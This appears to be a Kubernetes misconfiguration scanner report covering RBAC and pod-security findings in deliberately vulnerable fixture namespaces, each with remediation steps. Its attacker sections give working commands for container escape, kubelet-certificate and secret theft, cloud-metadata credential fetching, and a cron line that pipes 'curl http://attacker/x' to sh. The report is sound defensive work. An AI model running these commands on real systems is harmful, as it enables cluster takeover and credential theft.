MITRE ATT&CK: T1098.001T1528T1078.004

Affected subject

HIGH ServiceAccount/rbac-fixtures/sa-token-create Cluster 10.0
Cluster-wide create serviceaccounts/token enables token minting (ServiceAccount/rbac-fixtures/sa-token-create)
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-token-create Resource: RBACRule/cr-token-create

Subject ServiceAccount/rbac-fixtures/sa-token-create can create on the serviceaccounts/token subresource via ClusterRoleBinding crb-token-create → ClusterRole cr-token-create. Cluster-wide: applies to every current and future namespace.

The TokenRequest API (Kubernetes 1.22+) is the canonical way to mint a JWT ServiceAccount token, and its create verb is gated by RBAC on the serviceaccounts/token subresource. Anyone holding this verb on a ServiceAccount can mint a token authenticated as that ServiceAccount.

Datadog Security Labs published a write-up on its abuse for persistence: an attacker mints a long-lived token for the highest-privileged ServiceAccount they can reach (commonly kube-system/clusterrole-aggregation-controller, which holds escalate on ClusterRoles), and uses that token as a backdoor that survives the original RBAC binding being removed. Crucially, this verb is NOT covered by 'list secrets' detections. TokenRequest tokens are NOT stored as Secret objects; they're issued live by the apiserver and never leave a footprint on disk.

Impact Mint a JWT for any ServiceAccount in Cluster-wide. Cluster-wide variant trivially yields cluster-admin (mint a kube-system controller token). Tokens persist after the original binding is revoked.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
TechniqueTokenRequest minting

The create verb on serviceaccounts/token mints a fresh, valid token for any ServiceAccount in scope, with no pod required. Cleaner than the pod-creation route and harder to spot in audit logs.

  1. Attacker confirms the verb with kubectl auth can-i create serviceaccounts/token --as=sa-token-create -A.
  2. They enumerate high-privilege ServiceAccounts: kubectl get clusterrolebindings -o json | jq '.items[].subjects[]?.name' and pick one with cluster-admin, system:masters, or aggregated permissions.
  3. They mint a long-lived token via the TokenRequest API: kubectl create token <sa-name> -n <ns> --duration=8760h (1 year), or call /api/v1/namespaces/<ns>/serviceaccounts/<sa>/token directly.
  4. They kubectl --token=<jwt> get nodes and confirm the new identity.
  5. They cache the token off-cluster as a backdoor: rotating the original binding does NOT invalidate an issued token until its exp claim, which defaults to --service-account-max-token-expiration (often 1 year on legacy clusters).
Remediation
Remove create on serviceaccounts/token from non-control-plane identities; constrain any legitimate use with resourceNames to a tiny allowlist.
  1. Remove the verb. Outside kube-controller-manager and a small set of token-broker components, nothing should hold this.
  2. If a workload genuinely needs to mint tokens, scope with resourceNames to the exact ServiceAccounts it issues tokens for, never *.
  3. Enforce a low maximum token expiration cluster-wide via --service-account-max-token-expiration=1h on the API server (or the cloud equivalent).
  4. Capture every create on serviceaccounts/token at RequestResponse audit level and SIEM-alert on issuance to ServiceAccounts with cluster-admin/escalate/bind rights.
  5. Verify with kubectl auth can-i create serviceaccounts/token --as=sa-token-create -n kube-system returning no.
Evidence
ScopeCluster
API groupscore/v1
Resourcesserviceaccounts/token
serviceaccounts/token: Mint short-lived ServiceAccount tokens
Verbscreate
create: Create new objects of this resource
Source rolecr-token-create
Inspect: kubectl get clusterrole cr-token-create -o yaml
Source bindingcrb-token-create
Inspect: kubectl get clusterrolebinding crb-token-create -o yaml
Show raw JSON
{
  "api_groups": [
    ""
  ],
  "namespace": "",
  "resources": [
    "serviceaccounts/token"
  ],
  "scope": "cluster",
  "source_binding": "crb-token-create",
  "source_role": "cr-token-create",
  "verbs": [
    "create"
  ]
}
HIGH

Cluster-wide workload-controller mutation can spawn privileged pods on ServiceAccount/rbac-fixtures/sa-workload-mutate

KUBE-PRIVESC-003 1 subject Score 9.7
MITRE ATT&CK: T1610T1098T1078.004

Affected subject

HIGH ServiceAccount/rbac-fixtures/sa-workload-mutate Cluster 9.7
Cluster-wide workload-controller mutation can spawn privileged pods on ServiceAccount/rbac-fixtures/sa-workload-mutate
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-workload-mutate Resource: RBACRule/cr-workload-mutate

Subject ServiceAccount/rbac-fixtures/sa-workload-mutate can create/update/patch workload controllers (deployments, daemonsets, statefulsets, jobs, cronjobs) via ClusterRoleBinding crb-workload-mutate → ClusterRole cr-workload-mutate. Cluster-wide: applies to every current and future namespace.

Anyone who can write a workload template inherits the same implicit permissions as pods/create: choice of ServiceAccount, choice of Pod Security context, and choice of host-level features. The specific danger of controller mutation (vs. pod create) is durability and stealth: a kubectl edit deployment adding a privileged: true sidecar produces pods continuously, so restart-looping the pod returns a fresh shell every time.

DaemonSet write is the most dangerous variant because a DaemonSet runs one pod on every node, including new nodes added later. CronJobs offer time-based persistence that survives pod evictions, node reboots, and short-lived RBAC remediations. A realistic incident: an attacker with patch daemonsets in kube-system mutates kube-proxy to add a malicious sidecar inheriting the existing pod's host-mounts and ServiceAccount.

Impact Spawn (or mutate existing) pods running as any ServiceAccount in Cluster-wide. DaemonSet write specifically yields one attacker pod per node, including future nodes.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker enumerates writable controllers with kubectl auth can-i patch daemonsets --as=sa-workload-mutate -A.
  2. They identify a high-value DaemonSet (e.g. kube-system/kube-proxy, kube-system/cilium, or any node-agent that already runs privileged).
  3. They kubectl patch to add a sidecar container under their control, inheriting the existing pod's host-mounts, capabilities, and ServiceAccount.
  4. The DaemonSet controller rolls the change to every node; the attacker now has a privileged shell on every node and a node-level token on each.
  5. They use the token to enumerate cluster Secrets and pivot to control-plane components. Persistence survives subject-token rotation because the malicious sidecar continues running.
Remediation
Restrict workload-controller mutation to platform/CI identities; route application changes through GitOps with PR review.
  1. Audit who has create/update/patch on deployments,daemonsets,statefulsets,jobs,cronjobs. Most application identities should not have this.
  2. Move deployment changes behind GitOps (Argo CD/Flux) so humans push to Git and the controller applies the change under its own ServiceAccount.
  3. Add a Kyverno/Gatekeeper policy that rejects pod templates with privileged, hostPID, hostNetwork, hostPath mounts, or automountServiceAccountToken: true outside an explicit allowlist.
  4. For DaemonSets specifically, restrict creation to named platform ServiceAccounts. Verify with kubectl auth can-i create daemonsets --as=sa-workload-mutate -n kube-system returning no.
Evidence
ScopeCluster
API groupsappsbatch
Resourcesdeploymentsdaemonsetsstatefulsetsjobscronjobs
Verbscreateupdatepatch
create: Create new objects of this resource
update: Replace existing objects
patch: Mutate existing objects in place
Source rolecr-workload-mutate
Inspect: kubectl get clusterrole cr-workload-mutate -o yaml
Source bindingcrb-workload-mutate
Inspect: kubectl get clusterrolebinding crb-workload-mutate -o yaml
Show raw JSON
{
  "api_groups": [
    "apps",
    "batch"
  ],
  "namespace": "",
  "resources": [
    "deployments",
    "daemonsets",
    "statefulsets",
    "jobs",
    "cronjobs"
  ],
  "scope": "cluster",
  "source_binding": "crb-workload-mutate",
  "source_role": "cr-workload-mutate",
  "verbs": [
    "create",
    "update",
    "patch"
  ]
}

Pod Security

32 findings · 13 rules · 5 critical · 16 high · 10 medium · 1 low
CRITICAL

Docker socket mounted into Deployment/vulnerable/socket-mounts-app (volume docker-sock/var/run/docker.sock)

KUBE-ESCAPE-005 1 subject Score 10.0
MITRE ATT&CK: T1611T1610T1068

Affected subject

CRITICAL Deployment/vulnerable/socket-mounts-app Workload 10.0
Docker socket mounted into Deployment/vulnerable/socket-mounts-app (volume docker-sock/var/run/docker.sock)
Scope · Workload Workload Deployment/vulnerable/socket-mounts-app
Category: Privilege Escalation Resource: Deployment/vulnerable/socket-mounts-app Namespace: vulnerable

Workload Deployment/vulnerable/socket-mounts-app mounts the Docker UNIX socket /var/run/docker.sock from the node into the container (volume docker-sock). The Docker daemon listens on this socket as root and exposes the entire Docker Engine API, including POST /containers/create, which lets any client launch a new container with arbitrary mounts, devices, capabilities, and host-namespace settings.

Mounting docker.sock is equivalent to giving the workload an unrestricted root shell on the node. There is no permission boundary inside the Docker API; a "read-only" mount of the socket file does not help because the socket is a request channel, not a stored object. Once you can connect() to it, you can issue any command. The OWASP Docker Security Cheat Sheet calls this the top-priority anti-pattern, and HackTricks documents the breakout as a one-liner.

From inside the container, install the Docker CLI (or use curl --unix-socket) and run docker run -v /:/host --privileged --pid=host -it alpine chroot /host. The new container mounts the host root, runs as host root, and can drop a backdoor into /etc/cron.d/, steal /var/lib/kubelet/pki/, or nsenter -t 1 -a to land on the host directly.

Impact Equivalent to root on the node: launch any container with any mount, mount the host filesystem, steal kubelet certs, and pivot to the entire cluster.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
TechniqueContainer escape to host

The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

  1. Gain code execution in the pod with docker.sock mounted.
  2. Verify: ls -la /var/run/docker.sock; curl --unix-socket /var/run/docker.sock http://localhost/version.
  3. Spawn a privileged container that mounts host root: docker run -it --rm -v /:/host alpine chroot /host /bin/sh.
  4. Read kubelet client cert: cat /host/var/lib/kubelet/pki/kubelet-client-current.pem and use it to talk to the apiserver as system:node:<nodeName>.
  5. Persist by writing an SSH key to /host/root/.ssh/authorized_keys or installing a systemd service.
Remediation
Remove the docker.sock hostPath mount; do not run sibling-container patterns on Kubernetes.
  1. Identify why the workload talks to Docker. The usual suspects are a CI runner, log shipper, or build system. Replace with a Kubernetes-native alternative: Buildah/Kaniko/Buildkit-rootless for builds, the Kubernetes API for pod orchestration, fluent-bit's tail input for logs.
  2. Remove the hostPath: /var/run/docker.sock volume and corresponding volumeMount.
  3. Apply Pod Security Admission baseline to the namespace (forbids hostPath volumes) and/or use a Kyverno/OPA policy that explicitly denies this path.
  4. Validate: kubectl get deployment/socket-mounts-app -n vulnerable -o jsonpath='{.spec.template.spec.volumes}' | jq should not contain /var/run/docker.sock.
Evidence
Volumedocker-sock
Host path/var/run/docker.sock
Docker socket (container engine takeover)
Show raw JSON
{
  "path": "/var/run/docker.sock",
  "volume": "docker-sock"
}
CRITICAL

Root filesystem (/) mounted from host into Deployment/vulnerable/risky-app

KUBE-ESCAPE-006 1 subject Score 10.0
MITRE ATT&CK: T1611T1552.001T1543

Affected subject

CRITICAL Deployment/vulnerable/risky-app Workload 10.0
Root filesystem (/) mounted from host into Deployment/vulnerable/risky-app
Scope · Workload Workload Deployment/vulnerable/risky-app
Category: Privilege Escalation Resource: Deployment/vulnerable/risky-app Namespace: vulnerable

Workload Deployment/vulnerable/risky-app mounts the host's root filesystem (hostPath: /) inside the container via volume rootfs. Combined with the container's UID (typically root), this exposes the entire node filesystem: kubelet credentials, every other pod's mounted secrets, the container runtime state, and on control-plane nodes the static-pod manifests under /etc/kubernetes/manifests.

Mounting / is one of the few configurations that, by itself, guarantees host compromise without requiring a CVE, kernel exploit, or even the privileged flag. The kubelet stores per-pod secrets at /var/lib/kubelet/pods/<uid>/volumes/kubernetes.io~secret/<name>/... in cleartext (tmpfs); a read-only host-root mount is enough to copy them all out. A read-write mount turns this into trivial persistence: write to /etc/cron.d/, modify /etc/sudoers, drop a shared-object into /etc/ld.so.preload, or, on a control-plane node, drop a malicious manifest into /etc/kubernetes/manifests/ which the kubelet then runs as a static pod with full privileges.

A single command sequence (chroot /host, cat /host/var/lib/kubelet/pki/kubelet-client-current.pem, then kubectl --kubeconfig=<crafted> get secrets -A) yields full secret enumeration on every pod on the node. Public exploit aids (kubeletmein, peirates) automate the chain.

Impact Read every secret on the node; write to host cron, SSH, kubelet PKI, or static-pod manifests; persistence and pivot to cluster-admin.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
TechniqueContainer escape to host

The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

  1. RCE in the pod that mounts / at /host.
  2. Steal kubelet creds: cp /host/var/lib/kubelet/pki/kubelet-client-current.pem /tmp/k.pem.
  3. Enumerate other pods' secrets: find /host/var/lib/kubelet/pods -path '*/kubernetes.io~secret/*' -type f -exec cat {} \;.
  4. Persist: echo '* * * * * root curl http://attacker/x|sh' > /host/etc/cron.d/k8s (RW) or, on a control-plane node, cp evil-pod.yaml /host/etc/kubernetes/manifests/.
  5. With kubelet creds, run kubectl --client-certificate=/tmp/k.pem ... and harvest cluster secrets.
Remediation
Never mount / from the node. Use specific subpaths or projected volumes if absolutely required.
  1. Identify the actual file or directory the workload needs and replace the mount with the narrowest possible path (and readOnly: true).
  2. Where possible, replace hostPath entirely with a CSI-backed volume, ConfigMap, Secret, or projected volume.
  3. Apply Pod Security Admission baseline to the namespace (forbids hostPath). For unavoidable cases, allowlist via Kyverno/Gatekeeper that pins the path and readOnly: true.
  4. Validate: kubectl get deployment/risky-app -n vulnerable -o jsonpath='{.spec.template.spec.volumes[*].hostPath.path}' does not contain /.
Evidence
Volumerootfs
Host path/
Node root filesystem (full host takeover)
Show raw JSON
{
  "path": "/",
  "volume": "rootfs"
}
CRITICAL

Privileged container app in Deployment/vulnerable/risky-app

KUBE-ESCAPE-001 1 subject Score 9.9
MITRE ATT&CK: T1611T1610T1068

Affected subject

CRITICAL Deployment/vulnerable/risky-app Workload 9.9
Privileged container app in Deployment/vulnerable/risky-app
Scope · Workload Workload Deployment/vulnerable/risky-app
Category: Privilege Escalation Resource: Deployment/vulnerable/risky-app Namespace: vulnerable

Container app in Deployment/vulnerable/risky-app is configured with securityContext.privileged: true. A privileged container retains every Linux capability (CAP_SYS_ADMIN, CAP_SYS_MODULE, CAP_NET_ADMIN, etc.), bypasses all Linux Security Module profiles (AppArmor/SELinux), runs without the default seccomp profile, and shares /dev with the host. From the kernel's perspective it is indistinguishable from a process running directly on the node.

This is the single most dangerous PodSpec setting: capability drops, read-only root filesystem, and runAsNonRoot are all neutralised because the container can simply remount, reload kernel modules, or call setuid(0). The Pod Security Standards explicitly forbid privileged containers at both Baseline and Restricted levels.

Real-world breakout: an attacker with code execution loads a kernel module with insmod (CAP_SYS_MODULE), or uses mknod to recreate /dev/sda1, mounts the host root, and writes to /root/.ssh/authorized_keys. Public exploit tooling (deepce, kdigger -ac, kubeletmein) automates these in seconds.

Impact Full root on the host node: read every Secret on the node, exfiltrate the kubelet client certificate, schedule pods anywhere, and pivot to other nodes.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
TechniqueContainer escape to host

The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

  1. Attacker gains code execution inside the privileged pod (RCE, malicious image, SSRF→shell).
  2. They confirm the configuration with kdigger dig admission or deepce.sh.
  3. They mount the host filesystem: mkdir /host && mount /dev/sda1 /host.
  4. They steal kubelet credentials from /host/var/lib/kubelet/pki/kubelet-client-current.pem or write /host/root/.ssh/authorized_keys.
  5. With kubelet creds they list every Pod and Secret on the node, then escalate to cluster-admin via the cgroup-release-agent technique or nsenter -t 1 -a.
Remediation
Remove privileged: true and explicitly grant only the Linux capabilities the workload actually needs.
  1. Audit why the container needs privileged. Most apps do not. Trace which capability is actually required (often only NET_BIND_SERVICE).
  2. Replace privileged: true with capabilities.drop: [ALL] and an explicit capabilities.add: [<NEEDED_CAP>]. Add allowPrivilegeEscalation: false, readOnlyRootFilesystem: true, runAsNonRoot: true, and seccompProfile.type: RuntimeDefault.
  3. Enforce at admission time: label the namespace pod-security.kubernetes.io/enforce: baseline (or restricted) so future regressions are blocked.
  4. Validate with kubectl get deployment/risky-app -n vulnerable -o jsonpath='{.spec.template.spec.containers[*].securityContext.privileged}' returning empty/false.
Evidence
Containerapp
Show raw JSON
{
  "container": "app"
}
CRITICAL

Containerd socket mounted into Deployment/vulnerable/socket-mounts-app (volume containerd-sock)

KUBE-CONTAINERD-SOCKET-001 1 subject Score 9.8
MITRE ATT&CK: T1611T1610T1068

Affected subject

CRITICAL Deployment/vulnerable/socket-mounts-app Workload 9.8
Containerd socket mounted into Deployment/vulnerable/socket-mounts-app (volume containerd-sock)
Scope · Workload Workload Deployment/vulnerable/socket-mounts-app
Category: Privilege Escalation Resource: Deployment/vulnerable/socket-mounts-app Namespace: vulnerable

Workload Deployment/vulnerable/socket-mounts-app mounts containerd's UNIX socket (/run/containerd/containerd.sock or /var/run/containerd/containerd.sock) into the container via volume containerd-sock. Containerd runs as root and is the runtime the kubelet uses to start every pod on the node. In practice, this means that if you can talk to its API, you can create, modify, or exec into any container on the host, including kube-system control-plane pods.

This is the modern equivalent of the docker.sock anti-pattern. Since Kubernetes 1.24 removed dockershim, most clusters use containerd or CRI-O directly; the same breakout primitives apply but the tooling differs (ctr, crictl). Kubernetes places its containers under containerd namespace k8s.io, so ctr -n k8s.io containers list enumerates every pod on the node.

The Grey Corner's containerd-socket-exploitation series documents the one-liner: install or copy the ctr binary, then run ctr --address /run/containerd/containerd.sock -n k8s.io run --rm --mount type=bind,src=/,dst=/host,options=rbind:rw --privileged docker.io/library/alpine:latest pwn /bin/sh. The result is a privileged container with / mounted at /host. From there an attacker reads the kubelet client cert, dumps every pod's secrets, or task execs a reverse shell into the apiserver static pod on a control-plane node.

Impact Root on the node and arbitrary code execution inside any container on the node, including kube-system static pods. Equivalent to compromising the kubelet itself.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Code execution in the pod with containerd.sock mounted.
  2. ls -la /run/containerd/containerd.sock; ctr --address /run/containerd/containerd.sock version.
  3. List target containers: ctr -n k8s.io containers list. Note kube-apiserver, etcd, or any victim app.
  4. Spawn a privileged escape container: ctr -n k8s.io run --rm --privileged --mount type=bind,src=/,dst=/host,options=rbind:rw docker.io/library/alpine:latest x /bin/sh -c 'chroot /host'.
  5. From host, harvest /var/lib/kubelet/pki/kubelet-client-current.pem and pivot to the API server.
Remediation
Remove the containerd-socket hostPath mount; use the Kubernetes API or CRI-aware tools instead.
  1. Determine why the workload needs CRI access. Legitimate use is rare and typically limited to specific node-agent observability tools. Replace with a Kubernetes-API-driven alternative.
  2. Remove the hostPath volume and volumeMount targeting /run/containerd/containerd.sock (and aliases).
  3. For monitoring use cases, use the kubelet's /metrics/cadvisor endpoint behind an RBAC-scoped ServiceAccount, not raw socket access.
  4. Validate: kubectl get deployment/socket-mounts-app -n vulnerable -o yaml | grep -i containerd returns no socket mount.
Evidence
Volumecontainerd-sock
Host path/var/run/containerd/containerd.sock
containerd socket (container engine takeover)
Show raw JSON
{
  "path": "/var/run/containerd/containerd.sock",
  "volume": "containerd-sock"
}
CRITICAL

Pod shares host PID namespace (hostPID: true) in Deployment/vulnerable/host-ns-app

KUBE-ESCAPE-002 1 subject Score 9.0
MITRE ATT&CK: T1611T1552.001T1057

Affected subject

CRITICAL Deployment/vulnerable/host-ns-app Workload 9.0
Pod shares host PID namespace (hostPID: true) in Deployment/vulnerable/host-ns-app
Scope · Workload Workload Deployment/vulnerable/host-ns-app
Category: Privilege Escalation Resource: Deployment/vulnerable/host-ns-app Namespace: vulnerable

Workload Deployment/vulnerable/host-ns-app sets spec.hostPID: true, joining the host's PID namespace. Every process on the node (kubelet, container runtime, other tenant workloads, sshd, cloud-init agents) is visible via /proc and addressable by PID from inside this pod.

The risk is twofold. First, information disclosure: /proc/<pid>/environ, /proc/<pid>/cmdline, and /proc/<pid>/root/... leak environment variables (which often contain database passwords, cloud credentials, and Kubernetes service-account tokens), CLI args, and arbitrary file contents from other containers' rootfs. Second, when combined with CAP_SYS_PTRACE or privileged: true, an attacker can nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash and land directly in the host's mount namespace as root.

Bishop Fox's bad-pods library and kdigger's processes bucket grep /proc/*/environ for AWS_, KUBE_, DATABASE_URL, and service-account JWTs. Even without extra capabilities, host-PID alone is enough to harvest cleartext credentials from neighboring pods on the same node. This is a classic noisy-neighbor escalation primitive (TeamTNT, Hildegard).

Impact Read process arguments, environment variables, and /proc/<pid>/root of every other pod on the node; harvest service-account tokens and cloud credentials from neighbors.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
TechniqueContainer escape to host

The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

  1. Gain code execution in the pod with hostPID: true.
  2. Enumerate processes: ps -ef shows host kubelet, runc, and sibling containers.
  3. Loot environments: for p in /proc/[0-9]*/environ; do tr '\0' '\n' < $p; done | grep -iE 'token|secret|aws|key'.
  4. Read other pods' service-account tokens via cat /proc/<pid>/root/var/run/secrets/kubernetes.io/serviceaccount/token.
  5. If CAP_SYS_PTRACE or privileged is also present, nsenter -t 1 -a to land in the host root namespace and persist via SSH key or systemd unit.
Remediation
Set spec.hostPID: false (or omit it; the default is false).
  1. Identify why hostPID was set; legitimate uses are limited to node-monitoring DaemonSets like node-exporter.
  2. Remove hostPID: true from the pod template (or set explicitly to false).
  3. Apply Pod Security Admission baseline: kubectl label ns <ns> pod-security.kubernetes.io/enforce=baseline.
  4. Validate with kubectl get deployment/host-ns-app -n vulnerable -o jsonpath='{.spec.template.spec.hostPID}' returning empty or false.
Evidence
hostPIDtrue
Shares the node's process namespace (can ptrace/kill node processes)
Show raw JSON
{
  "hostPID": true
}
HIGH

/var/log mounted from host into Deployment/vulnerable/socket-mounts-app enables log-symlink escape primitive

KUBE-ESCAPE-008 1 subject Score 8.5
MITRE ATT&CK: T1611T1552.001T1083

Affected subject

HIGH Deployment/vulnerable/socket-mounts-app Workload 8.5
/var/log mounted from host into Deployment/vulnerable/socket-mounts-app enables log-symlink escape primitive
Scope · Workload Workload Deployment/vulnerable/socket-mounts-app
Category: Privilege Escalation Resource: Deployment/vulnerable/socket-mounts-app Namespace: vulnerable

Workload Deployment/vulnerable/socket-mounts-app mounts /var/log from the host via volume var-log. This directory is the canonical container-log staging area: the kubelet writes per-pod logs into /var/log/pods/<ns>_<pod>_<uid>/<container>/0.log as symlinks pointing to the runtime's actual log files.

The exploit is that kubectl logs causes the kubelet (running as root) to read those symlinks. If a pod can write into the host's /var/log (because it has the directory mounted), it can replace its own 0.log symlink with one pointing to ANY file on the node, e.g. /etc/shadow or /var/lib/kubelet/pki/kubelet-client-current.pem. The next kubectl logs <pod> returns the contents of that file as if it were the container's stdout. This is the well-known /var/log symlink escape (Aqua Security, KubeHound CE_VAR_LOG_SYMLINK, CVE-2017-1002101, CVE-2021-25741).

The pattern is very common in misconfigured log shippers (Fluentd, Filebeat, Promtail). On multi-tenant clusters where any user can kubectl logs against pods they own, this is a universal arbitrary-file-read primitive.

Impact Arbitrary file read on the host node as root via the kubelet's log-resolving behavior; compromise kubelet PKI, /etc/shadow, etcd snapshots, every pod's mounted secrets.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
TechniqueContainer escape to host

The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

  1. RCE in a pod that has hostPath: /var/log mounted (RW).
  2. Find own pod's log-symlink directory: ls -la /var/log/pods/.
  3. Replace 0.log symlink: ln -sf /etc/shadow /var/log/pods/<ns>_<pod>_<uid>/<container>/0.log.
  4. Trigger the read: kubectl logs <pod> -c <container> returns /etc/shadow.
  5. Repeat for kubelet PKI and pivot via direct apiserver auth as system:node:<nodeName>.
Remediation
Do not mount /var/log (or its subdirectories) from the host into application pods; use the kubelet logs API or a log-aggregator sidecar pattern.
  1. For log-shipper DaemonSets that genuinely need host logs, switch to read-only mount AND restrict to /var/log/containers and /var/log/pods only (not the parent /var/log).
  2. Configure the log shipper to refuse following symlinks (e.g. Fluent Bit Path_Key) and run as a non-root UID.
  3. For application pods, route logs to stdout/stderr only. Kubernetes captures these without any hostPath. Drop the hostPath mount.
  4. Validate: kubectl get deployment/socket-mounts-app -n vulnerable -o yaml | grep -A2 hostPath does not contain /var/log (or only narrow read-only sub-path).
Evidence
Volumevar-log
Host path/var/log
Node logs (symlinks let you read other pods' logs)
Show raw JSON
{
  "path": "/var/log",
  "volume": "var-log"
}
HIGH

Pod shares host network (hostNetwork: true) in Deployment/vulnerable/risky-app

KUBE-ESCAPE-003 1 subject Score 8.1
MITRE ATT&CK: T1611T1552.005T1046T1040

Affected subject

HIGH Deployment/vulnerable/risky-app Workload 8.1
Pod shares host network (hostNetwork: true) in Deployment/vulnerable/risky-app
Scope · Workload Workload Deployment/vulnerable/risky-app
Category: Lateral Movement Resource: Deployment/vulnerable/risky-app Namespace: vulnerable

Workload Deployment/vulnerable/risky-app sets spec.hostNetwork: true. The container is no longer in a sandboxed network namespace. It sees the node's interfaces, listens on the node's IPs and ports, and reaches every loopback service the kubelet talks to.

The most dangerous consequence is that NetworkPolicies cannot apply. Cilium, Calico, and the upstream NetworkPolicy spec key off the pod's veth and labels, and a hostNetwork pod has neither, so all egress filtering is silently bypassed. On managed Kubernetes (EKS/GKE/AKS) the workload can reach the cloud Instance Metadata Service at 169.254.169.254 even when the cluster has set IMDSv2 hop-count protection. The result is a one-step path from container RCE to AWS/Azure/GCP IAM credential theft.

The pod can also bind privileged ports the host already uses, redirect kube-proxy, sniff service traffic, or scan internal-only addresses such as 127.0.0.1:10250 (kubelet) which is otherwise unreachable from a normal pod.

Impact Bypasses NetworkPolicy and IMDSv2 hop protection; container reaches cloud metadata, kubelet localhost, and any node-loopback service. This pivots cluster compromise into cloud-account compromise.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
TechniqueContainer escape to host

The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

  1. Gain code execution in the pod (web RCE, malicious image).
  2. Confirm hostNetwork: ip addr shows the node's primary interface, not a pod CIDR.
  3. Hit the IMDS: curl -s http://169.254.169.254/latest/api/token -X PUT -H 'X-aws-ec2-metadata-token-ttl-seconds: 21600' then fetch iam/security-credentials/<role>.
  4. Use stolen IAM creds with aws sts get-caller-identity and pivot to S3/EKS API.
  5. Optional: probe 127.0.0.1:10250 (kubelet). If anonymous auth is enabled, run curl -k https://127.0.0.1:10250/pods to enumerate every pod on the node and exec into any of them.
Remediation
Set hostNetwork: false (default) and route any node-level networking through a CNI-managed Service or NetworkPolicy-aware DaemonSet.
  1. Audit if hostNetwork is required. Typically only kube-proxy, CNI agents, or node-local DNS legitimately need it.
  2. Remove hostNetwork: true. If a host port is genuinely required, prefer a Service of type NodePort or an Ingress controller behind a NetworkPolicy.
  3. Enforce IMDSv2 with hop-limit = 1 on every node; apply an egress NetworkPolicy denying 169.254.169.254/32 for application namespaces.
  4. Validate: kubectl get deployment/risky-app -n vulnerable -o jsonpath='{.spec.template.spec.hostNetwork}' is empty/false; kubectl exec ... -- curl -m 2 http://169.254.169.254/ should fail.
Evidence
hostNetworktrue
Shares the node's network namespace (sees every pod's traffic, binds to node IPs)
Show raw JSON
{
  "hostNetwork": true
}
HIGH

Pod shares host IPC (hostIPC: true) in Deployment/vulnerable/host-ns-app

KUBE-ESCAPE-004 1 subject Score 8.0
MITRE ATT&CK: T1611T1552.001T1005

Affected subject

HIGH Deployment/vulnerable/host-ns-app Workload 8.0
Pod shares host IPC (hostIPC: true) in Deployment/vulnerable/host-ns-app
Scope · Workload Workload Deployment/vulnerable/host-ns-app
Category: Privilege Escalation Resource: Deployment/vulnerable/host-ns-app Namespace: vulnerable

Workload Deployment/vulnerable/host-ns-app sets spec.hostIPC: true, joining the host's IPC (Inter-Process Communication) namespace. The container can read and write the host's POSIX shared-memory segments (/dev/shm), SysV shared memory, message queues, and semaphore arrays.

